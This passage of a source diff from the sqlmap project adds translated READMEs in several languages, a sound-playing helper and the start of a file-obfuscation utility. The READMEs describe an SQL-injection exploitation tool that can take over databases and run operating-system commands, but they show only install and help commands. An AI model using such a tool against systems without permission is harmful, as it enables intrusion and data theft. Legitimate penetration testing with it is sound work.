+Για μια γενικότερη άποψη των δυνατοτήτων του sqlmap, μια λίστα των υποστηριζόμενων χαρακτηριστικών και περιγραφή για όλες τις επιλογές, μαζί με παραδείγματα, καλείστε να συμβουλευτείτε το [εγχειρίδιο χρήστη](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+
+Σύνδεσμοι
+----
+
+* Αρχική σελίδα: http://sqlmap.org
+* Λήψεις: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ή [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Προβλήματα: https://github.com/sqlmapproject/sqlmap/issues
+* Εγχειρίδιο Χρήστη: https://github.com/sqlmapproject/sqlmap/wiki
+* Συχνές Ερωτήσεις (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* Εικόνες: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

doc/translations/README-hr-HR.md

@@ -0,0 +1,50 @@
+# sqlmap
+
+[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
+
+sqlmap je alat namijenjen za penetracijsko testiranje koji automatizira proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije te preuzimanje poslužitelja baze podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko dohvaćanja podataka iz baze, do pristupa zahvaćenom datotečnom sustavu i izvršavanja komandi na operacijskom sustavu korištenjem tzv. "out-of-band" veza.
+
+Slike zaslona
+----
+
+![Slika zaslona](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+Možete posjetiti [kolekciju slika zaslona](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) gdje se demonstriraju neke od značajki na wiki stranicama.
+
+Instalacija
+----
+
+Možete preuzeti zadnji tarball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/tarball/master) ili zadnji zipball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Po mogućnosti, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sqlmapproject/sqlmap) repozitorija:
+
+    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap radi bez posebnih zahtjeva korištenjem [Python](http://www.python.org/download/) verzije **2.6.x** i/ili **2.7.x** na bilo kojoj platformi.
+
+Korištenje
+----
+
+Kako biste dobili listu osnovnih opcija i prekidača koristite:
+
+    python sqlmap.py -h
+
+Kako biste dobili listu svih opcija i prekidača koristite:
+
+    python sqlmap.py -hh
+
+Možete pronaći primjer izvršavanja [ovdje](https://asciinema.org/a/46601).
+Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih značajki te opis svih opcija i prekidača, zajedno s primjerima, preporučen je uvid u [korisnički priručnik](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+
+Poveznice
+----
+
+* Početna stranica: http://sqlmap.org
+* Preuzimanje: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ili [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* RSS feed promjena u kodu: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Prijava problema: https://github.com/sqlmapproject/sqlmap/issues
+* Korisnički priručnik: https://github.com/sqlmapproject/sqlmap/wiki
+* Najčešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Demo: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* Slike zaslona: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

doc/translations/README-id-ID.md

@@ -0,0 +1,51 @@
+# sqlmap
+
+[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
+
+sqlmap merupakan alat _(tool)_ bantu _open source_ dalam melakukan tes penetrasi yang mengotomasi proses deteksi dan eksploitasi kelemahan _SQL injection_ dan pengambil-alihan server basisdata. sqlmap dilengkapi dengan pendeteksi canggih, fitur-fitur hanal bagi _penetration tester_, beragam cara untuk mendeteksi basisdata, hingga mengakses _file system_ dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_. 
+
+Tangkapan Layar
+----
+
+![Tangkapan Layar](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+Anda dapat mengunjungi [koleksi tangkapan layar](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) yang mendemonstrasikan beberapa fitur dalam wiki.
+
+Instalasi
+----
+
+Anda dapat mengunduh tarball versi terbaru [di sini]
+(https://github.com/sqlmapproject/sqlmap/tarball/master) atau zipball [di sini](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Sebagai alternatif, Anda dapat mengunduh sqlmap dengan men-_clone_ repositori [Git](https://github.com/sqlmapproject/sqlmap):
+
+    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap berfungsi langsung pada [Python](http://www.python.org/download/) versi **2.6.x** dan **2.7.x** pada platform apapun.
+
+Penggunaan
+----
+
+Untuk mendapatkan daftar opsi dasar gunakan:
+
+    python sqlmap.py -h
+
+Untuk mendapatkan daftar opsi lanjut gunakan:
+
+    python sqlmap.py -hh
+
+Anda dapat mendapatkan contoh penggunaan [di sini](https://asciinema.org/a/46601).
+Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya, Anda disarankan untuk membaca [Panduan Pengguna](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+
+Tautan
+----
+
+* Situs: http://sqlmap.org
+* Unduh: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) atau [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* RSS feed dari commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
+* Wiki Manual Penggunaan: https://github.com/sqlmapproject/sqlmap/wiki
+* Pertanyaan yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Video Demo [#1](http://www.youtube.com/user/inquisb/videos) dan [#2](http://www.youtube.com/user/stamparm/videos)
+* Tangkapan Layar: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

doc/translations/README-it-IT.md

@@ -0,0 +1,50 @@
+# sqlmap
+
+[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
+
+sqlmap è uno strumento open source per il penetration testing. Il suo scopo è quello di rendere automatico il processo di scoperta ed exploit di vulnerabilità di tipo SQL injection al fine di compromettere database online. Dispone di un potente motore per la ricerca di vulnerabilità, molti strumenti di nicchia anche per il più esperto penetration tester ed un'ampia gamma di controlli che vanno dal fingerprinting di database allo scaricamento di dati, fino all'accesso al file system sottostante e l'esecuzione di comandi nel sistema operativo attraverso connessioni out-of-band.
+
+Screenshot
+----
+
+![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+Nella wiki puoi visitare [l'elenco di screenshot](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) che mostrano il funzionamento di alcune delle funzionalità del programma.
+
+Installazione
+----
+
+Puoi scaricare l'ultima tarball cliccando [qui](https://github.com/sqlmapproject/sqlmap/tarball/master) oppure l'ultima zipball cliccando [qui](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+La cosa migliore sarebbe però scaricare sqlmap clonando la repository [Git](https://github.com/sqlmapproject/sqlmap):
+
+    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap è in grado di funzionare con le versioni **2.6.x** e **2.7.x** di [Python](http://www.python.org/download/) su ogni piattaforma.
+
+Utilizzo
+----
+
+Per una lista delle opzioni e dei controlli di base:
+
+    python sqlmap.py -h
+
+Per una lista di tutte le opzioni e di tutti i controlli:
+
+    python sqlmap.py -hh
+
+Puoi trovare un esempio di esecuzione [qui](https://asciinema.org/a/46601).
+Per una panoramica delle capacità di sqlmap, una lista delle sue funzionalità e la descrizione di tutte le sue opzioni e controlli, insieme ad un gran numero di esempi, siete pregati di visitare lo [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage) (disponibile solo in inglese).
+
+Link
+----
+
+* Sito: http://sqlmap.org
+* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* RSS feed dei commit: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
+* Manuale dell'utente: https://github.com/sqlmapproject/sqlmap/wiki
+* Domande più frequenti (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Dimostrazioni: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* Screenshot: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

doc/translations/README-ja-JP.md

@@ -0,0 +1,51 @@
+# sqlmap
+
+[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
+
+sqlmapはオープンソースのペネトレーションテスティングツールです。SQLインジェクションの脆弱性の検出、活用、そしてデータベースサーバ奪取のプロセスを自動化します。
+強力な検出エンジン、ペネトレーションテスターのための多くのニッチ機能、持続的なデータベースのフィンガープリンティングから、データベースのデータ取得やアウトオブバンド接続を介したオペレーティング・システム上でのコマンド実行、ファイルシステムへのアクセスなどの広範囲に及ぶスイッチを提供します。
+
+スクリーンショット
+----
+
+![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+wikiに載っているいくつかの機能のデモをスクリーンショットで見ることができます。 [スクリーンショット集](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots)
+
+インストール
+----
+
+最新のtarballを [こちら](https://github.com/sqlmapproject/sqlmap/tarball/master) から、最新のzipballを [こちら](https://github.com/sqlmapproject/sqlmap/zipball/master) からダウンロードできます。
+
+[Git](https://github.com/sqlmapproject/sqlmap) レポジトリをクローンして、sqlmapをダウンロードすることも可能です。:
+
+    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmapは、 [Python](http://www.python.org/download/) バージョン **2.6.x** または **2.7.x** がインストールされていれば、全てのプラットフォームですぐに使用できます。
+
+使用法
+----
+
+基本的なオプションとスイッチの使用法をリストするには:
+
+    python sqlmap.py -h
+
+全てのオプションとスイッチの使用法をリストするには:
+
+    python sqlmap.py -hh
+
+実行例を [こちら](https://asciinema.org/a/46601) で見ることができます。
+sqlmapの概要、機能の一覧、全てのオプションやスイッチの使用法を例とともに、 [ユーザーマニュアル](https://github.com/sqlmapproject/sqlmap/wiki/Usage) で確認することができます。
+
+リンク
+----
+
+* ホームページ: http://sqlmap.org
+* ダウンロード: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* コミットのRSSフィード: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* 課題管理: https://github.com/sqlmapproject/sqlmap/issues
+* ユーザーマニュアル: https://github.com/sqlmapproject/sqlmap/wiki
+* よくある質問 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* デモ: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* スクリーンショット: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

doc/translations/README-pl-PL.md

@@ -0,0 +1,50 @@
+# sqlmap
+
+[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
+
+sqlmap to open sourceowe narzędzie do testów penetracyjnych, które automatyzuje procesy detekcji, przejmowania i testowania odporności serwerów SQL na podatność na iniekcję niechcianego kodu. Zawiera potężny mechanizm detekcji, wiele niszowych funkcji dla zaawansowanych testów penetracyjnych oraz szeroki wachlarz opcji począwszy od identyfikacji bazy danych, poprzez wydobywanie z nich danych, a nawet pozwalającuch na dostęp do systemu plików o uruchamianie poleceń w systemie operacyjnym serwera poprzez niestandardowe połączenia.
+
+Zrzuty ekranowe
+----
+
+![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+Możesz odwiedzić [kolekcję zrzutów](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstruującą na wiki niektóre możliwości.
+
+Instalacja
+----
+
+Najnowsze tarball archiwum jest dostępne po klikcięciu [tutaj](https://github.com/sqlmapproject/sqlmap/tarball/master) lub najnowsze zipball archiwum po kliknięciu [tutaj](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Można również pobrać sqlmap klonując rezozytorium [Git](https://github.com/sqlmapproject/sqlmap):
+
+    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+do użycia sqlmap potrzebny jest [Python](http://www.python.org/download/) w wersji **2.6.x** lub **2.7.x** na dowolnej platformie systemowej.
+
+Sposób użycia
+----
+
+Aby uzyskać listę podstawowych funkcji i parametrów użyj polecenia:
+
+    python sqlmap.py -h
+
+Aby uzyskać listę wszystkich funkcji i parametrów użyj polecenia:
+
+    python sqlmap.py -hh
+
+Przykładowy wynik działania dostępny [tutaj](https://asciinema.org/a/46601).
+Aby uzyskać listę wszystkich dostępnych fukcji, parametrów i opisów ich działania wraz z przykładami użycia sqlnap proponujemy odwiedzić [instrukjcę użytkowania](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+
+Odnośniki
+----
+
+* Strona projektu: http://sqlmap.org
+* Pobieranie: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Raportowanie błędów: https://github.com/sqlmapproject/sqlmap/issues
+* Instrukcja użytkowania: https://github.com/sqlmapproject/sqlmap/wiki
+* Często zadawane pytania (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Dema: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* Zrzuty ekranowe: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

doc/translations/README-pt-BR.md

@@ -0,0 +1,51 @@
+# sqlmap
+
+[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
+
+sqlmap é uma ferramenta de teste de penetração de código aberto que automatiza o processo de detecção e exploração de falhas de injeção SQL. Com essa ferramenta é possível assumir total controle de servidores de banco de dados em páginas web vulneráveis, inclusive de base de dados fora do sistema invadido. Ele possui um motor de detecção poderoso, empregando as últimas e mais devastadoras técnicas de teste de penetração por SQL Injection, que permite acessar a base de dados, o sistema de arquivos subjacente e executar comandos no sistema operacional.
+
+Imagens
+----
+
+![Imagem](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+Você pode visitar a [coleção de imagens](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) que demonstra alguns dos recursos apresentados na wiki.
+
+Instalação
+----
+
+Você pode baixar o arquivo tar mais recente clicando [aqui]
+(https://github.com/sqlmapproject/sqlmap/tarball/master) ou o arquivo zip mais recente clicando [aqui](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+De preferência, você pode baixar o sqlmap clonando o repositório [Git](https://github.com/sqlmapproject/sqlmap):
+
+    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap funciona em [Python](http://www.python.org/download/) nas versões **2.6.x** e **2.7.x** em todas as plataformas.
+
+Como usar
+----
+
+Para obter uma lista das opções básicas faça:
+
+    python sqlmap.py -h
+
+Para obter a lista completa de opções faça:
+
+    python sqlmap.py -hh
+
+Você pode encontrar alguns exemplos [aqui](https://asciinema.org/a/46601).
+Para ter uma visão geral dos recursos do sqlmap, lista de recursos suportados e a descrição de todas as opções, juntamente com exemplos, aconselhamos que você consulte o [manual do usuário](https://github.com/sqlmapproject/sqlmap/wiki).
+
+Links
+----
+
+* Homepage: http://sqlmap.org
+* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
+* Manual do Usuário: https://github.com/sqlmapproject/sqlmap/wiki
+* Perguntas frequentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Demonstrações: [#1](http://www.youtube.com/user/inquisb/videos) e [#2](http://www.youtube.com/user/stamparm/videos)
+* Imagens: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

doc/translations/README-tr-TR.md

@@ -0,0 +1,53 @@
+# sqlmap
+
+[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
+
+sqlmap sql injection açıklarını otomatik olarak tespit ve istismar etmeye yarayan açık kaynak bir penetrasyon aracıdır. sqlmap gelişmiş tespit özelliğinin yanı sıra penetrasyon testleri sırasında gerekli olabilecek bir çok aracı, -uzak veritabınınından, veri indirmek, dosya sistemine erişmek, dosya çalıştırmak gibi - işlevleri de barındırmaktadır.
+
+
+Ekran görüntüleri
+----
+
+![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+
+İsterseniz özelliklerin tanıtımının yapıldığı [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) sayfasını ziyaret edebilirsiniz.
+
+
+Kurulum
+----
+
+[Buraya](https://github.com/sqlmapproject/sqlmap/tarball/master) tıklayarak en son sürüm tarball'ı veya [buraya](https://github.com/sqlmapproject/sqlmap/zipball/master) tıklayarak zipbal'ı indirebilirsiniz.
+
+Veya tercihen, [Git](https://github.com/sqlmapproject/sqlmap) reposunu klonlayarak indirebilirsiniz
+
+    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap [Python](http://www.python.org/download/) sitesinde bulunan **2.6.x** and **2.7.x** versiyonları ile bütün platformlarda çalışabilmektedir.
+
+Kullanım
+----
+
+
+Bütün basit seçeneklerin listesini gösterir
+
+    python sqlmap.py -h
+
+Bütün seçenekleri gösterir
+
+    python sqlmap.py -hh
+
+Program ile ilgili örnekleri [burada](https://asciinema.org/a/46601) bulabilirsiniz. Daha fazlası içinsqlmap'in bütün açıklamaları ile birlikte bütün özelliklerinin, örnekleri ile bulunduğu  [manuel sayfamıza](https://github.com/sqlmapproject/sqlmap/wiki/Usage) bakmanızı tavsiye ediyoruz
+
+Links
+----
+
+* Anasayfa: http://sqlmap.org
+* İndirme bağlantıları: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* Commitlerin RSS beslemeleri: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Hata takip etme sistemi: https://github.com/sqlmapproject/sqlmap/issues
+* Kullanıcı Manueli: https://github.com/sqlmapproject/sqlmap/wiki
+* Sıkça Sorulan Sorular(SSS): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Demolar: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* Ekran görüntüleri: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

doc/translations/README-zh-CN.md

@@ -0,0 +1,49 @@
+# sqlmap
+
+[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
+
+sqlmap 是一个开源的渗透测试工具，可以用来自动化的检测，利用SQL注入漏洞，获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项，包括获取数据库中存储的数据，访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
+
+演示截图
+----
+
+![截图](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+你可以访问 wiki上的 [截图](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) 查看各种用法的演示
+
+安装方法
+----
+
+你可以点击 [这里](https://github.com/sqlmapproject/sqlmap/tarball/master) 下载最新的 `tar` 打包的源代码 或者点击 [这里](https://github.com/sqlmapproject/sqlmap/zipball/master)下载最新的 `zip` 打包的源代码.
+
+推荐你从 [Git](https://github.com/sqlmapproject/sqlmap) 仓库获取最新的源代码:
+
+    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap 可以运行在 [Python](http://www.python.org/download/)  **2.6.x**  和  **2.7.x** 版本的任何平台上
+
+使用方法
+----
+
+通过如下命令可以查看基本的用法及命令行参数:
+
+    python sqlmap.py -h
+
+通过如下的命令可以查看所有的用法及命令行参数:
+
+    python sqlmap.py -hh
+
+你可以从 [这里](https://asciinema.org/a/46601) 看到一个sqlmap 的使用样例。除此以外，你还可以查看 [使用手册](https://github.com/sqlmapproject/sqlmap/wiki/Usage)。获取sqlmap所有支持的特性、参数、命令行选项开关及说明的使用帮助。
+
+链接
+----
+
+* 项目主页: http://sqlmap.org
+* 源代码下载: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* RSS 订阅: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
+* 使用手册: https://github.com/sqlmapproject/sqlmap/wiki
+* 常见问题 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* 教程: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* 截图: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

extra/__init__.py

@@ -1,9 +1,7 @@
 #!/usr/bin/env python
 
 """
-$Id$
-
-Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
+Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

extra/beep/__init__.py

@@ -1,9 +1,7 @@
 #!/usr/bin/env python
 
 """
-$Id$
-
-Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
+Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

extra/beep/beep.py

@@ -0,0 +1,96 @@
+#!/usr/bin/env python
+
+"""
+beep.py - Make a beep sound
+
+Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import os
+import subprocess
+import sys
+import wave
+
+BEEP_WAV_FILENAME = os.path.join(os.path.dirname(__file__), "beep.wav")
+
+def beep():
+    try:
+        if subprocess.mswindows:
+            _win_wav_play(BEEP_WAV_FILENAME)
+        elif sys.platform == "darwin":
+            _mac_beep()
+        elif sys.platform == "linux2":
+            _linux_wav_play(BEEP_WAV_FILENAME)
+        else:
+            _speaker_beep()
+    except:
+        _speaker_beep()
+
+def _speaker_beep():
+    sys.stdout.write('\a')  # doesn't work on modern Linux systems
+
+    try:
+        sys.stdout.flush()
+    except IOError:
+        pass
+
+def _mac_beep():
+    import Carbon.Snd
+    Carbon.Snd.SysBeep(1)
+
+def _win_wav_play(filename):
+    import winsound
+
+    winsound.PlaySound(filename, winsound.SND_FILENAME)
+
+def _linux_wav_play(filename):
+    for _ in ("aplay", "paplay", "play"):
+        if not os.system("%s '%s' 2>/dev/null" % (_, filename)):
+            return
+
+    import ctypes
+
+    PA_STREAM_PLAYBACK = 1
+    PA_SAMPLE_S16LE = 3
+    BUFFSIZE = 1024
+
+    class struct_pa_sample_spec(ctypes.Structure):
+        _fields_ = [("format", ctypes.c_int), ("rate", ctypes.c_uint32), ("channels", ctypes.c_uint8)]
+
+    pa = ctypes.cdll.LoadLibrary("libpulse-simple.so.0")
+
+    wave_file = wave.open(filename, "rb")
+
+    pa_sample_spec = struct_pa_sample_spec()
+    pa_sample_spec.rate = wave_file.getframerate()
+    pa_sample_spec.channels = wave_file.getnchannels()
+    pa_sample_spec.format = PA_SAMPLE_S16LE
+
+    error = ctypes.c_int(0)
+
+    pa_stream = pa.pa_simple_new(None, filename, PA_STREAM_PLAYBACK, None, "playback", ctypes.byref(pa_sample_spec), None, None, ctypes.byref(error))
+    if not pa_stream:
+        raise Exception("Could not create pulse audio stream: %s" % pa.strerror(ctypes.byref(error)))
+
+    while True:
+        latency = pa.pa_simple_get_latency(pa_stream, ctypes.byref(error))
+        if latency == -1:
+            raise Exception("Getting latency failed")
+
+        buf = wave_file.readframes(BUFFSIZE)
+        if not buf:
+            break
+
+        if pa.pa_simple_write(pa_stream, buf, len(buf), ctypes.byref(error)):
+            raise Exception("Could not play file")
+
+    wave_file.close()
+
+    if pa.pa_simple_drain(pa_stream, ctypes.byref(error)):
+        raise Exception("Could not simple drain")
+
+    pa.pa_simple_free(pa_stream)
+
+if __name__ == "__main__":
+    beep()

extra/cloak/__init__.py

@@ -1,9 +1,7 @@
 #!/usr/bin/env python
 
 """
-$Id$
-
-Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
+Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

extra/cloak/cloak.py

@@ -1,17 +1,15 @@
 #!/usr/bin/env python
 
 """
-$Id$
-
 cloak.py - Simple file encryption/compression utility
 
-Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
+Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
-import bz2
 import os
 import sys
+import zlib
 
 from optparse import OptionError
 from optparse import OptionParser
@@ -26,23 +24,30 @@ def hideAscii(data):
 
     return retVal
 
-def cloak(inputFile):
-    f = open(inputFile, 'rb')
-    data = bz2.compress(f.read())
-    f.close()
+def cloak(inputFile=None, data=None):
+    if data is None:
